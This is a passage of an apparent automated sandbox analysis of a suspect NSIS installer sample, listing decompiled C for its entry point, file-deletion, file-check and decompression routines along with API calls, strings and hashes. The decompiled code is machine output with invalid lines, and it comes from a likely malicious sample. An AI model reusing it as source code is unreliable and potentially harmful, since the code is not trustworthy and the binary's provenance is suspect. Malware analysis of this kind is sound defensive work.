GetModuleHandleA 4188->4190 4189->4180 4191 401ffc GetProcAddress 4189->4191 4190->4189 4190->4191 4192 402049 4191->4192 4193 40200c 4191->4193 4194 404e9f 24 API calls 4192->4194 4195 401423 24 API calls 4193->4195 4196 40201c 4193->4196 4194->4196 4195->4196 4196->4185 4197 402058 FreeLibrary 4196->4197 4197->4185 4198 40262f 4199 402636 4198->4199 4201 4028c7 

                Control-flow Graph
                [Graph of function 004032fa (_entry_) not reproduced; legend: executed / not executed nodes]
                C-Code - Quality: 68%
                			_entry_() {
                				struct _SHFILEINFOA _v356;
                				struct _SECURITY_ATTRIBUTES* _v376;
                				char _v380;
                				CHAR* _v384;
                				char _v392;
                				int _v396;
                				int _v400;
                				signed int _v404;
                				CHAR* _v408;
                				int _v412;
                				intOrPtr _v416;
                				struct _SECURITY_ATTRIBUTES* _v424;
                				void* _v432;
                				intOrPtr _t34;
                				CHAR* _t38;
                				char* _t41;
                				signed int _t43;
                				void* _t47;
                				int _t49;
                				signed int _t50;
                				signed int _t53;
                				int _t54;
                				signed int _t58;
                				intOrPtr _t69;
                				intOrPtr _t75;
                				void* _t77;
                				void* _t87;
                				void* _t89;
                				char* _t94;
                				signed int _t95;
                				void* _t96;
                				signed int _t97;
                				signed int _t98;
                				signed int _t101;
                				CHAR* _t103;
                				signed int _t104;
                				void* _t105;
                				intOrPtr _t111;
                				char _t118;
                
                				_t105 =  &_v384;
                				_v376 = 0;
                				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                				_t97 = 0;
                				_v380 = 0x20;
                				__imp__#17();
                				__imp__OleInitialize(0); // executed
                				 *0x423fd4 = _t34;
                				SHGetFileInfoA(0x41f4e8, 0,  &_v356, 0x160, 0); // executed
                				E00405AF4("xwkwrbeiqiuu Setup", "NSIS Error");
                				_t38 = GetCommandLineA();
                				_t94 = "\"C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe\" ";
                				E00405AF4(_t94, _t38);
                				 *0x423f20 = GetModuleHandleA(0);
                				_t41 = _t94;
                				if("\"C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe\" " == 0x22) {
                					_v404 = 0x22;
                					_t41 =  &M00429001;
                				}
                				_t43 = CharNextA(E00405612(_t41, _v404));
                				_v404 = _t43;
                				while(1) {
                					_t89 =  *_t43;
                					_t107 = _t89;
                					if(_t89 == 0) {
                						break;
                					}
                					__eflags = _t89 - 0x20;
                					if(_t89 != 0x20) {
                						L5:
                						__eflags =  *_t43 - 0x22;
                						_v404 = 0x20;
                						if( *_t43 == 0x22) {
                							_t43 = _t43 + 1;
                							__eflags = _t43;
                							_v404 = 0x22;
                						}
                						__eflags =  *_t43 - 0x2f;
                						if( *_t43 != 0x2f) {
                							L15:
                							_t43 = E00405612(_t43, _v404);
                							__eflags =  *_t43 - 0x22;
                							if(__eflags == 0) {
                								_t43 = _t43 + 1;
                								__eflags = _t43;
                							}
                							continue;
                						} else {
                							_t43 = _t43 + 1;
                							__eflags =  *_t43 - 0x53;
                							if( *_t43 == 0x53) {
                								__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                								if(( *(_t43 + 1) | 0x00000020) == 0x20) {
                									_t97 = _t97 | 0x00000002;
                									__eflags = _t97;
                								}
                							}
                							__eflags =  *_t43 - 0x4352434e;
                							if( *_t43 == 0x4352434e) {
                								__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                								if(( *(_t43 + 4) | 0x00000020) == 0x20) {
                									_t97 = _t97 | 0x00000004;
                									__eflags = _t97;
                								}
                							}
                							__eflags =  *((intOrPtr*)(_t43 - 2)) - 0x3d442f20;
                							if( *((intOrPtr*)(_t43 - 2)) == 0x3d442f20) {
                								 *((intOrPtr*)(_t43 - 2)) = 0;
                								_t44 = _t43 + 2;
                								__eflags = _t43 + 2;
                								E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t44);
                								L20:
                								_t103 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                								GetTempPathA(0x400, _t103);
                								_t47 = E004032C6(_t107);
                								_t108 = _t47;
                								if(_t47 != 0) {
                									L22:
                									DeleteFileA("1033"); // executed
                									_t49 = E00402C7D(_t109, _t97); // executed
                									_v412 = _t49;
                									if(_t49 != 0) {
                										L32:
                										ExitProcess(); // executed
                										__imp__OleUninitialize(); // executed
                										if(_v404 == 0) {
                											__eflags =  *0x423fb4; // 0x0
                											if(__eflags != 0) {
                												_t104 = E00405DDA(3);
                												_t98 = E00405DDA(4);
                												_t53 = E00405DDA(5);
                												__eflags = _t104;
                												_t95 = _t53;
                												if(_t104 != 0) {
                													__eflags = _t98;
                													if(_t98 != 0) {
                														__eflags = _t95;
                														if(_t95 != 0) {
                															_t58 =  *_t104(GetCurrentProcess(), 0x28,  &_v392);
                															__eflags = _t58;
                															if(_t58 != 0) {
                																 *_t98(0, "SeShutdownPrivilege",  &_v396);
                																_v412 = 1;
                																_v400 = 2;
                																 *_t95(_v416, 0,  &_v412, 0, 0, 0);
                															}
                														}
                													}
                												}
                												_t54 = ExitWindowsEx(2, 0);
                												__eflags = _t54;
                												if(_t54 == 0) {
                													E0040140B(9);
                												}
                											}
                											_t50 =  *0x423fcc; // 0xffffffff
                											__eflags = _t50 - 0xffffffff;
                											if(_t50 != 0xffffffff) {
                												_v396 = _t50;
                											}
                											ExitProcess(_v396);
                										}
                										E004053C2(_v404, 0x200010);
                										ExitProcess(2);
                									}
                									_t111 =  *0x423f34; // 0x0
                									if(_t111 == 0) {
                										L31:
                										 *0x423fcc =  *0x423fcc | 0xffffffff;
                										_v400 = E004036A1();
                										goto L32;
                									}
                									_t101 = E00405612(_t94, 0);
                									while(_t101 >= _t94) {
                										__eflags =  *_t101 - 0x3d3f5f20;
                										if(__eflags == 0) {
                											break;
                										}
                										_t101 = _t101 - 1;
                										__eflags = _t101;
                									}
                									_t113 = _t101 - _t94;
                									_v408 = "Error launching installer";
                									if(_t101 < _t94) {
                										lstrcatA(_t103, "~nsu.tmp");
                										_t99 = "C:\\Users\\alfons\\Desktop";
                										if(lstrcmpiA(_t103, "C:\\Users\\alfons\\Desktop") == 0) {
                											goto L32;
                										}
                										CreateDirectoryA(_t103, 0);
                										SetCurrentDirectoryA(_t103);
                										_t118 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                										if(_t118 == 0) {
                											E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t99);
                										}
                										E00405AF4(0x424000, _v396);
                										 *0x424400 = 0x41;
                										_t96 = 0x1a;
                										do {
                											_t69 =  *0x423f28; // 0x74d188
                											_push( *((intOrPtr*)(_t69 + 0x120)));
                											_push(0x41f0e8);
                											E00405B16(0, _t96, 0x41f0e8);
                											DeleteFileA(0x41f0e8);
                											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe", 0x41f0e8, 1) != 0) {
                												_push(0);
                												_push(0x41f0e8);
                												E00405842();
                												_t75 =  *0x423f28; // 0x74d188
                												_push( *((intOrPtr*)(_t75 + 0x124)));
                												_push(0x41f0e8);
                												E00405B16(0, _t96, 0x41f0e8);
                												_t77 = E00405361(0x41f0e8);
                												if(_t77 != 0) {
                													CloseHandle(_t77);
                													 *((intOrPtr*)(_t105 + 0x10)) = 0;
                												}
                											}
                											 *0x424400 =  *0x424400 + 1;
                											_t96 = _t96 - 1;
                										} while (_t96 != 0);
                										_push(0);
                										_push(_t103);
                										E00405842();
                										goto L32;
                									}
                									 *_t101 = 0;
                									_t102 = _t101 + 4;
                									if(E004056C8(_t113, _t101 + 4) == 0) {
                										goto L32;
                									}
                									E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t102);
                									E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t102);
                									_v424 = 0;
                									goto L31;
                								}
                								GetWindowsDirectoryA(_t103, 0x3fb);
                								lstrcatA(_t103, "\\Temp");
                								_t87 = E004032C6(_t108);
                								_t109 = _t87;
                								if(_t87 == 0) {
                									goto L32;
                								}
                								goto L22;
                							}
                							goto L15;
                						}
                					} else {
                						goto L4;
                					}
                					do {
                						L4:
                						_t43 = _t43 + 1;
                						__eflags =  *_t43 - 0x20;
                					} while ( *_t43 == 0x20);
                					goto L5;
                				}
                				goto L20;
                			}

                APIs
                • #17.COMCTL32 ref: 00403319
                • OleInitialize.OLE32(00000000), ref: 00403320
                • SHGetFileInfoA.SHELL32(0041F4E8,00000000,?,00000160,00000000), ref: 0040333C
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                • GetCommandLineA.KERNEL32(xwkwrbeiqiuu Setup,NSIS Error), ref: 00403351
                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000), ref: 00403364
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000020), ref: 0040338F
                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403422
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403437
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403443
                • DeleteFileA.KERNELBASE(1033), ref: 00403456
                • ExitProcess.KERNEL32(00000000), ref: 004034CF
                • OleUninitialize.OLE32(00000000), ref: 004034D4
                • ExitProcess.KERNEL32 ref: 004034F4
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000,00000000), ref: 00403500
                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000,00000000), ref: 0040350C
                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403518
                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040351F
                • DeleteFileA.KERNEL32(0041F0E8,0041F0E8,?,00424000,?), ref: 00403569
                • CopyFileA.KERNEL32 ref: 0040357D
                • CloseHandle.KERNEL32(00000000,0041F0E8,0041F0E8,?,0041F0E8,00000000), ref: 004035AA
                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004035FF
                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040363B
                • ExitProcess.KERNEL32 ref: 0040365E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ExitFileProcess$Directory$CurrentDeleteHandleWindowslstrcat$CharCloseCommandCopyCreateInfoInitializeLineModuleNextPathTempUninitializelstrcmpilstrcpyn
                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\O1ySvN9SvL.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\O1ySvN9SvL.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$xwkwrbeiqiuu Setup$~nsu.tmp
                • API String ID: 3411505140-3907866466
                • Opcode ID: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                • Instruction ID: 185554a669e391af13640c5e948e6a5ed170759bbde9d6c9181f60cdac0bc0dd
                • Opcode Fuzzy Hash: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                • Instruction Fuzzy Hash: 2691E330A08341BED7216F619D49B2B7EACEB44306F44093BF541B62E2C77C9E058B6E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph
                [Graph of function 00405426 not reproduced; legend: executed / not executed nodes]
                C-Code - Quality: 94%
                			E00405426(void* __edi, void* __eflags, signed int _a4, signed int _a8) {
                				void* _v8;
                				signed int _v12;
                				struct _WIN32_FIND_DATAA _v332;
                				signed int _t38;
                				char* _t50;
                				signed int _t53;
                				signed int _t56;
                				signed int _t62;
                				signed int _t64;
                				void* _t66;
                				CHAR* _t67;
                				signed char _t68;
                				CHAR* _t71;
                				char* _t75;
                
                				_t67 = _a4;
                				_t38 = E004056C8(__eflags, _t67);
                				_t68 = _a8;
                				_v12 = _t38;
                				if((_t68 & 0x00000008) != 0) {
                					_t64 = DeleteFileA(_t67); // executed
                					asm("sbb eax, eax");
                					_t66 =  ~_t64 + 1;
                					 *0x423fa8 =  *0x423fa8 + _t66;
                					return _t66;
                				}
                				_a4 = _t68;
                				_t7 =  &_a4;
                				 *_t7 = _a4 & 0x00000001;
                				__eflags =  *_t7;
                				if( *_t7 == 0) {
                					L5:
                					E00405AF4(0x421538, _t67);
                					__eflags = _a4;
                					if(_a4 == 0) {
                						E0040562E(_t67);
                					} else {
                						lstrcatA(0x421538, "\*.*");
                					}
                					lstrcatA(_t67, 0x409010);
                					_t71 =  &(_t67[lstrlenA(_t67)]); // executed
                					_t38 = FindFirstFileA(0x421538,  &_v332); // executed
                					__eflags = _t38 - 0xffffffff;
                					_v8 = _t38;
                					if(_t38 == 0xffffffff) {
                						L26:
                						__eflags = _a4;
                						if(_a4 != 0) {
                							_t32 = _t71 - 1;
                							 *_t32 =  *(_t71 - 1) & 0x00000000;
                							__eflags =  *_t32;
                						}
                						goto L28;
                					} else {
                						goto L9;
                					}
                					do {
                						L9:
                						_t75 =  &(_v332.cFileName);
                						_t50 = E00405612( &(_v332.cFileName), 0x3f);
                						__eflags =  *_t50;
                						if( *_t50 != 0) {
                							__eflags = _v332.cAlternateFileName;
                							if(_v332.cAlternateFileName != 0) {
                								_t75 =  &(_v332.cAlternateFileName);
                							}
                						}
                						__eflags =  *_t75 - 0x2e;
                						if( *_t75 != 0x2e) {
                							L16:
                							E00405AF4(_t71, _t75);
                							__eflags = _v332.dwFileAttributes & 0x00000010;
                							if((_v332.dwFileAttributes & 0x00000010) == 0) {
                								E004057AC(_t67);
                								_t53 = DeleteFileA(_t67);
                								__eflags = _t53;
                								if(_t53 != 0) {
                									E00404E9F(0xfffffff2, _t67);
                								} else {
                									__eflags = _a8 & 0x00000004;
                									if((_a8 & 0x00000004) == 0) {
                										 *0x423fa8 =  *0x423fa8 + 1;
                									} else {
                										E00404E9F(0xfffffff1, _t67);
                										_push(0);
                										_push(_t67);
                										E00405842();
                									}
                								}
                							} else {
                								__eflags = (_a8 & 0x00000003) - 3;
                								if(__eflags == 0) {
                									E00405426(_t71, __eflags, _t67, _a8);
                								}
                							}
                							goto L24;
                						}
                						_t62 =  *((intOrPtr*)(_t75 + 1));
                						__eflags = _t62;
                						if(_t62 == 0) {
                							goto L24;
                						}
                						__eflags = _t62 - 0x2e;
                						if(_t62 != 0x2e) {
                							goto L16;
                						}
                						__eflags =  *((char*)(_t75 + 2));
                						if( *((char*)(_t75 + 2)) == 0) {
                							goto L24;
                						}
                						goto L16;
                						L24:
                						_t56 = FindNextFileA(_v8,  &_v332); // executed
                						__eflags = _t56;
                					} while (_t56 != 0);
                					_t38 = FindClose(_v8); // executed
                					goto L26;
                				} else {
                					__eflags = _t38;
                					if(_t38 == 0) {
                						L28:
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L36:
                							return _t38;
                						}
                						__eflags = _v12;
                						if(_v12 != 0) {
                							_t38 = E00405D9C(_t67);
                							__eflags = _t38;
                							if(_t38 == 0) {
                								goto L36;
                							}
                							E004055E7(_t67);
                							E004057AC(_t67);
                							_t38 = RemoveDirectoryA(_t67); // executed
                							__eflags = _t38;
                							if(_t38 != 0) {
                								return E00404E9F(0xffffffe5, _t67);
                							}
                							__eflags = _a8 & 0x00000004;
                							if((_a8 & 0x00000004) == 0) {
                								goto L30;
                							}
                							E00404E9F(0xfffffff1, _t67);
                							_push(0);
                							_push(_t67);
                							return E00405842();
                						}
                						L30:
                						 *0x423fa8 =  *0x423fa8 + 1;
                						return _t38;
                					}
                					__eflags = _t68 & 0x00000002;
                					if((_t68 & 0x00000002) == 0) {
                						goto L28;
                					}
                					goto L5;
                				}
                			}


















                APIs
                • DeleteFileA.KERNELBASE(?,?,76DDF560,00000000), ref: 00405446
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 0040548F
                • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 004054A2
                • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 004054A8
                • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 004054B9
                • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040556B
                • FindClose.KERNELBASE(?), ref: 0040557C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*$\*.*
                • API String ID: 2035342205-2994364368
                • Opcode ID: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                • Instruction ID: 72c9b9ae93c356e5fbaabc5fff99037f1728fc53f432d7f95e6e75a23a32325d
                • Opcode Fuzzy Hash: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                • Instruction Fuzzy Hash: C941D070804A087ACB21AB358C85BEF3A6DDF01355F14847BB846B61D6C63C9E81CEAD
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 582 405d9c-405dc5 SetErrorMode FindFirstFileA SetErrorMode 583 405dd2 582->583 584 405dc7-405dd0 FindClose 582->584 585 405dd4-405dd7 583->585 584->585
                C-Code - Quality: 100%
                			E00405D9C(CHAR* _a4) {
                				void* _t3;
                				void* _t8;
                
                				SetErrorMode(0x8001); // executed
                				_t3 = FindFirstFileA(_a4, 0x422580); // executed
                				_t8 = _t3; // executed
                				SetErrorMode(0); // executed
                				if(_t8 == 0xffffffff) {
                					return 0;
                				}
                				FindClose(_t8); // executed
                				return 0x422580;
                			}






                APIs
                • SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560), ref: 00405DAA
                • FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                • SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                • FindClose.KERNELBASE(00000000), ref: 00405DC8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ErrorFindMode$CloseFileFirst
                • String ID: C:\
                • API String ID: 2885216544-3404278061
                • Opcode ID: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                • Instruction ID: a6a8c167051aeed94988b7bc9a417df50a67df51a882c0690b661480960f0059
                • Opcode Fuzzy Hash: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                • Instruction Fuzzy Hash: A8E08632B0455067C20017B46D4CE073658DF85721F208533B240B62D0D5B55C118BFA
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                C-Code - Quality: 98%
                			E00406083() {
                				unsigned short _t531;
                				signed int _t532;
                				void _t533;
                				void* _t534;
                				signed int _t535;
                				signed int _t565;
                				signed int _t568;
                				signed int _t590;
                				signed int* _t607;
                				void* _t614;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t614 - 0x40) != 0) {
                						 *(_t614 - 0x34) = 1;
                						 *(_t614 - 0x84) = 7;
                						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                						L132:
                						 *(_t614 - 0x54) = _t607;
                						L133:
                						_t531 =  *_t607;
                						_t590 = _t531 & 0x0000ffff;
                						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                						if( *(_t614 - 0xc) >= _t565) {
                							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                							 *(_t614 - 0x40) = 1;
                							_t532 = _t531 - (_t531 >> 5);
                							 *_t607 = _t532;
                						} else {
                							 *(_t614 - 0x10) = _t565;
                							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                						}
                						if( *(_t614 - 0x10) >= 0x1000000) {
                							L139:
                							_t533 =  *(_t614 - 0x84);
                							L140:
                							 *(_t614 - 0x88) = _t533;
                							goto L1;
                						} else {
                							L137:
                							if( *(_t614 - 0x6c) == 0) {
                								 *(_t614 - 0x88) = 5;
                								goto L170;
                							}
                							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                							goto L139;
                						}
                					} else {
                						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                						__esi =  *(__ebp - 0x60);
                						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                						__ecx =  *(__ebp - 0x3c);
                						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                						__ecx =  *(__ebp - 4);
                						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                						if( *(__ebp - 0x38) >= 4) {
                							if( *(__ebp - 0x38) >= 0xa) {
                								_t97 = __ebp - 0x38;
                								 *_t97 =  *(__ebp - 0x38) - 6;
                							} else {
                								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                							}
                						} else {
                							 *(__ebp - 0x38) = 0;
                						}
                						if( *(__ebp - 0x34) == __edx) {
                							__ebx = 0;
                							__ebx = 1;
                							L60:
                							__eax =  *(__ebp - 0x58);
                							__edx = __ebx + __ebx;
                							__ecx =  *(__ebp - 0x10);
                							__esi = __edx + __eax;
                							__ecx =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
                							 *(__ebp - 0x54) = __esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								_t216 = __edx + 1; // 0x1
                								__ebx = _t216;
                								__cx = __ax >> 5;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								L59:
                								if(__ebx >= 0x100) {
                									goto L54;
                								}
                								goto L60;
                							} else {
                								L57:
                								if( *(__ebp - 0x6c) == 0) {
                									 *(__ebp - 0x88) = 0xf;
                									goto L170;
                								}
                								__ecx =  *(__ebp - 0x70);
                								__eax =  *(__ebp - 0xc);
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								_t202 = __ebp - 0x70;
                								 *_t202 =  *(__ebp - 0x70) + 1;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								goto L59;
                							}
                						} else {
                							__eax =  *(__ebp - 0x14);
                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                							if(__eax >=  *(__ebp - 0x74)) {
                								__eax = __eax +  *(__ebp - 0x74);
                							}
                							__ecx =  *(__ebp - 8);
                							__ebx = 0;
                							__ebx = 1;
                							__al =  *((intOrPtr*)(__eax + __ecx));
                							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                							L40:
                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                							__ecx =  *(__ebp - 0x58);
                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                							 *(__ebp - 0x48) = __eax;
                							__eax = __eax + 1;
                							__eax = __eax << 8;
                							__eax = __eax + __ebx;
                							__esi =  *(__ebp - 0x58) + __eax * 2;
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
